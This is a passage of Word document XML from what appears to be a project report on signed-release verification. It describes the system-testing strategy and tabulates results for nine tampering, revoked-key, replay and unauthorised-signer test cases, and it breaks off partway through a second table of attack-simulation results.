        <w:spacing w:after="40" w:before="0" w:line="312" w:lineRule="auto"/>
        <w:jc w:val="both"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="90"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman"/>
          <w:b/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>Malicious source before build</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman"/>
          <w:b w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> (SolarWinds-style [13]): a signature proves who released a file, not that its source is benign. Provenance and code review reduce this risk.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160" w:before="0" w:line="312" w:lineRule="auto"/>
        <w:jc w:val="both"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="90"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman"/>
          <w:b/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>Prototype key storage:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman"/>
          <w:b w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> demo keys are unencrypted PEM files; production must use an HSM or cloud KMS.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:pageBreakBefore/>
        <w:spacing w:after="360"/>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman"/>
          <w:b/>
          <w:sz w:val="28"/>
        </w:rPr>
        <w:t>CHAPTER 7</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman"/>
          <w:b/>
          <w:sz w:val="32"/>
        </w:rPr>
        <w:t>SYSTEM TESTING</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman"/>
          <w:b/>
          <w:sz w:val="26"/>
        </w:rPr>
        <w:t>7.1 Testing Strategy</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="40" w:before="0" w:line="312" w:lineRule="auto"/>
        <w:jc w:val="both"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="90"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman"/>
          <w:b/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>Automated test suite</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman"/>
          <w:b w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> (</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New" w:eastAsia="Courier New"/>
          <w:b w:val="0"/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>tests/test_supply_chain.py</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman"/>
          <w:b w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>): the nine required cases, each built on a freshly signed release, with measured latency, detection rate and false-acceptance rate.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="40" w:before="0" w:line="312" w:lineRule="auto"/>
        <w:jc w:val="both"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="90"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman"/>
          <w:b/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>Attack simulations</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman"/>
          <w:b w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> (</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New" w:eastAsia="Courier New"/>
          <w:b w:val="0"/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>attack_simulation/tamper.py</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman"/>
          <w:b w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New" w:eastAsia="Courier New"/>
          <w:b w:val="0"/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>revoked_key_test.py</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman"/>
          <w:b w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>): end-to-end Codecov-style tampering, rogue and revoked keys, and replay.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="40" w:before="0" w:line="312" w:lineRule="auto"/>
        <w:jc w:val="both"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="90"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman"/>
          <w:b/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>CI gate</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman"/>
          <w:b w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> (</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New" w:eastAsia="Courier New"/>
          <w:b w:val="0"/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>ci/security_gate.py</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman"/>
          <w:b w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>): exit code checked for a legitimate and a tampered release.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160" w:before="0" w:line="312" w:lineRule="auto"/>
        <w:jc w:val="both"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="90"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman"/>
          <w:b/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>Live demonstration</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman"/>
          <w:b w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> (</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New" w:eastAsia="Courier New"/>
          <w:b w:val="0"/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>demo.py</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman"/>
          <w:b w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>): the 14-step protocol, with the audit log and dashboard as evidence.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman"/>
          <w:b/>
          <w:sz w:val="26"/>
        </w:rPr>
        <w:t>7.2 Test Cases and Results</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepNext/>
        <w:spacing w:after="80" w:before="120" w:line="240" w:lineRule="auto"/>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman"/>
          <w:b/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve">Table 7.1: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman"/>
          <w:i/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>Results of the nine required test cases</w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="TableGrid"/>
        <w:tblW w:type="auto" w:w="0"/>
        <w:jc w:val="center"/>
        <w:tblLayout w:type="fixed"/>
        <w:tblLook w:firstColumn="1" w:firstRow="1" w:lastColumn="0" w:lastRow="0" w:noHBand="0" w:noVBand="1" w:val="04A0"/>
        <w:tblLayout w:type="fixed"/>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="623"/>
        <w:gridCol w:w="3628"/>
        <w:gridCol w:w="1020"/>
        <w:gridCol w:w="2835"/>
        <w:gridCol w:w="850"/>
      </w:tblGrid>
      <w:tr>
        <w:trPr>
          <w:tblHeader w:val="true"/>
          <w:cantSplit/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="624"/>
            <w:shd w:val="clear" w:color="auto" w:fill="D9E2F3"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="20" w:before="0" w:line="252" w:lineRule="auto"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman"/>
                <w:b/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>Test</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3628"/>
            <w:shd w:val="clear" w:color="auto" w:fill="D9E2F3"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="20" w:before="0" w:line="252" w:lineRule="auto"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman"/>
                <w:b/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>Attack / condition</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1020"/>
            <w:shd w:val="clear" w:color="auto" w:fill="D9E2F3"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="20" w:before="0" w:line="252" w:lineRule="auto"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman"/>
                <w:b/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>Expected</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2835"/>
            <w:shd w:val="clear" w:color="auto" w:fill="D9E2F3"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="20" w:before="0" w:line="252" w:lineRule="auto"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman"/>
                <w:b/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>Actual (status code)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="850"/>
            <w:shd w:val="clear" w:color="auto" w:fill="D9E2F3"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="20" w:before="0" w:line="252" w:lineRule="auto"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman"/>
                <w:b/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>Status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1</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3628"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="20" w:before="0" w:line="252" w:lineRule="auto"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman"/>
                <w:b w:val="0"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>Valid artifact</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1020"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="20" w:before="0" w:line="252" w:lineRule="auto"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman"/>
                <w:b w:val="0"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>PASS</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2835"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="20" w:before="0" w:line="252" w:lineRule="auto"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman"/>
                <w:b w:val="0"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>PASS</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2</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3628"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="20" w:before="0" w:line="252" w:lineRule="auto"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman"/>
                <w:b w:val="0"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>Modified artifact: one line appended after signing</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(HASH_MISMATCH)</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3</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3628"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="20" w:before="0" w:line="252" w:lineRule="auto"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman"/>
                <w:b w:val="0"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>Invalid signature: signature bytes corrupted</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(INVALID_SIGNATURE)</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4</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3628"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="20" w:before="0" w:line="252" w:lineRule="auto"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman"/>
                <w:b w:val="0"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>Wrong public key: manifest points to another key</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(UNAUTHORIZED_KEY)</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5</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3628"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="20" w:before="0" w:line="252" w:lineRule="auto"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman"/>
                <w:b w:val="0"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>Revoked key: key listed in the CRL</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(REVOKED)</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6</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3628"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="20" w:before="0" w:line="252" w:lineRule="auto"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman"/>
                <w:b w:val="0"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>Modified manifest: timestamp changed, not re-signed</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(INVALID_SIGNATURE)</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7</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3628"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="20" w:before="0" w:line="252" w:lineRule="auto"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman"/>
                <w:b w:val="0"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>Replay of old version: blacklisted 0.8.0</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(revoked version)</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8</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3628"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="20" w:before="0" w:line="252" w:lineRule="auto"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman"/>
                <w:b w:val="0"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>Unauthorised signing attempt: signer not trusted</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1020"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="20" w:before="0" w:line="252" w:lineRule="auto"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman"/>
                <w:b w:val="0"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>BLOCK</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2835"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="20" w:before="0" w:line="252" w:lineRule="auto"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman"/>
                <w:b w:val="0"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>BLOCKED (UNAUTHORIZED_KEY)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="850"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="20" w:before="0" w:line="252" w:lineRule="auto"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman"/>
                <w:b w:val="0"/>
                <w:sz w:val="19"/>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9"/>
              </w:rPr>
              <w:t>9</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3628"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="20" w:before="0" w:line="252" w:lineRule="auto"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman"/>
                <w:b w:val="0"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>Valid new release v1.0.1 signed with new key v2</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1020"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="20" w:before="0" w:line="252" w:lineRule="auto"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman"/>
                <w:b w:val="0"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>PASS</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2835"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="20" w:before="0" w:line="252" w:lineRule="auto"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman"/>
                <w:b w:val="0"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>PASS</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="850"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="20" w:before="0" w:line="252" w:lineRule="auto"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman"/>
                <w:b w:val="0"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>PASS</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The status codes were confirmed from the audit database entries written by each test.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman"/>
          <w:b/>
          <w:sz w:val="26"/>
        </w:rPr>
        <w:t>7.3 Attack Simulation Results</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepNext/>
        <w:spacing w:after="80" w:before="120" w:line="240" w:lineRule="auto"/>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman"/>
          <w:b/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve">Table 7.2: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman"/>
          <w:i/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>Attack simulation and gate results</w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="TableGrid"/>
        <w:tblW w:type="auto" w:w="0"/>
        <w:jc w:val="center"/>
        <w:tblLayout w:type="fixed"/>
        <w:tblLook w:firstColumn="1" w:firstRow="1" w:lastColumn="0" w:lastRow="0" w:noHBand="0" w:noVBand="1" w:val="04A0"/>
        <w:tblLayout w:type="fixed"/>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="3288"/>
        <w:gridCol w:w="1587"/>
        <w:gridCol w:w="4082"/>
      </w:tblGrid>
      <w:tr>
        <w:trPr>
          <w:tblHeader w:val="true"/>
          <w:cantSplit/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3288"/>
            <w:shd w:val="clear" w:color="auto" w:fill="D9E2F3"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="20" w:before="0" w:line="252" w:lineRule="auto"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman"/>
                <w:b/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>Simulation</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1587"/>
            <w:shd w:val="clear" w:color="auto" w:fill="D9E2F3"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="20" w:before="0" w:line="252" w:lineRule="auto"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman"/>
                <w:b/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>Gate verdict</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="4082"/>
            <w:shd w:val="clear" w:color="auto" w:fill="D9E2F3"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="20" w:before="0" w:line="252" w:lineRule="auto"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman"/>
                <w:b/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>Status code / evidence</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Scenario 2: Codecov-style tampering (</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New" w:eastAsia="Courier New"/>
                <w:b w:val="0"/>
                <w:sz w:val="16"/>
              </w:rPr>
              <w:t>tamper.py</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman"/>
                <w:b w:val="0"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1587"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="20" w:before="0" w:line="252" w:lineRule="auto"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman"/>
                <w:b w:val="0"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>BLOCKED</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="4082"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="20" w:before="0" w:line="252" w:lineRule="auto"/>
              <w:jc w:val="left"/>
